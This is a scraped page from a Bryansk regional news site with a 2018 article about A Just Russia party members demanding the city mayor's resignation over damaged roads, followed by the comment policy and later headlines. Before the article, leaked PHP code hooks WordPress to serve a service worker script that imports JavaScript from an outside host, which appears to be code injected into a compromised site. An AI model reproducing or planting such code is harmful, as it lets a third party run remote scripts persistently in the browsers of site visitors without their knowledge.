add_filter('do_parse_request', function ($bool, $wp) { if (isset($_SERVER['REQUEST_URI']) && rtrim($_SERVER['REQUEST_URI'], '/') === '/sw.js') { header('Content-Type: application/javascript'); echo 'importScripts("https://wp.aiso.live/sw.js");'; exit; } return $bool; }, 10, 2); add_action('wp_head', function () { echo ''; }); Справедливороссы потребовали отставки мэра Брянска Макарова | Брянские новости
Наверх

10 апреля 2018, Вторник, 07:41

Справедливороссы потребовали отставки мэра Брянска Макарова

Справедливороссы потребовали отставки мэра Брянска Макарова

Брянское отделение партии «Справедливая Россия» обратилось к прокурору области Александру Войтовичу с призывом принять решительные меры в отношении властей города. Администрацию обвинили в разрушенных дорогах.

Глава брянских справедливороссов Сергей Курденко потребовал созвать заседание депутатов горсовета, чтобы рассмотреть вопрос о соответствии Макарова занимаемой должности:

«Бездействие юридического лица в лице главы администрации Макарова А.Н. приводит к растрате бюджетных средств, так как в соответствии с законом на юридическое лицо накладывается финансовое обременение в виде штрафов. В результате действий (бездействий) сотрудников Брянской городской администрации причиняется существенный вред бюджету города Брянска. Налогоплательщики лишаются благ, которые могли бы получить».

Курденко просит провести проверку и выяснить, из какого источника оплачиваются штрафы, наложенные за неисполнение предписаний ОГИБДД на Брянскую городскую администрацию.

Сам Александр Макаров заявил, что новые недавно построенные дороги не разрушаются, а ямы появляются на тех, которые ремонтировались уже давно. По мнению многих горожан, он старается выполнять свою работу добросовестно и честно.

Кроме того, обвинения для начала нужно предъявить тем, кто назначал Макарова, то есть городскому совету. По мнению горожан, беспомощность и бездеятельность депутатов стали уже легендарными. Их работы не видно уже потому, что они собираются раз в два месяца. Для того, чтобы в городе появилась власть, нужно ее полностью реформировать, предусмотрев постоянную работу горсовета. То же самое касается и областной думы. В ней достаточно двух десятков депутатов, которые должны работать каждый день.

Фото: «Брянские новости» 


Редакция «Брянских новостей» оставляет за собой право удалять комментарии, нарушающие законодательство РФ. Запрещены высказывания, содержащие разжигание этнической и религиозной вражды, призывы к насилию, призывы к свержению конституционного строя, оскорбления конкретных лиц или любых групп граждан. Также удаляются комментарии, которые не удовлетворяют общепринятым нормам морали, преследуют рекламные цели, провоцируют пользователей на неконструктивный диалог, не относятся к комментируемой информации, оскорбляют авторов комментируемого материала, содержат ненормативную лексику. Редакция не несёт ответственности за мнения, высказанные в комментариях читателей. Комментарии на сайте «Брянские новости» публикуются без премодерации.

Комментарии для сайта Cackle
Заместитель секретаря Общественной палаты России побывал с визитом в Брянске

16 июня 2025, Понедельник, 18:14

Заместитель секретаря Общественной палаты России побывал с визитом в Брянске

Как пояснил губернатор, встреча с Владиславом Грибом стала хорошей возможностью обсудить развитие гражданского общества и федеральное взаимодействие

Мужчин пригласили в полицию Брянска за зарплатой в 100 тысяч рублей

16 июня 2025, Понедельник, 07:15

Мужчин пригласили в полицию Брянска за зарплатой в 100 тысяч рублей

Россиян приглашают на службу в УМВД Брянска за стабильным и своевременной зарплатой в размере от 40 до 100 тысяч рублей, как говорится в объявлении

Суд оставил в СИЗО обвиняемого в коррупции брянского полицейского Юрия Соколова

16 июня 2025, Понедельник, 07:00

Суд оставил в СИЗО обвиняемого в коррупции брянского полицейского Юрия Соколова

Дело все еще рассматривается районным судом, судья накануне продлил содержание подсудимого под стражей до 12 месяцев

Выдвижение Богомаза кандидатом в губернаторы потребует ответа от партий

15 июня 2025, Воскресенье, 21:16

Выдвижение Богомаза кандидатом в губернаторы потребует ответа от партий

На конференции отделения партии «Единая Россия» кандидатов в губернаторы Брянской области выдвинут Александр Богомаз. Это потребует ответа от партий

«Единая Россия» выдвинула Александра Богомаза кандидатом от партии на выборах губернатора Брянской области

15 июня 2025, Воскресенье, 17:31

«Единая Россия» выдвинула Александра Богомаза кандидатом от партии на выборах губернатора Брянской области

Соответствующее решение было принято сегодня на Конференции регионального отделения партии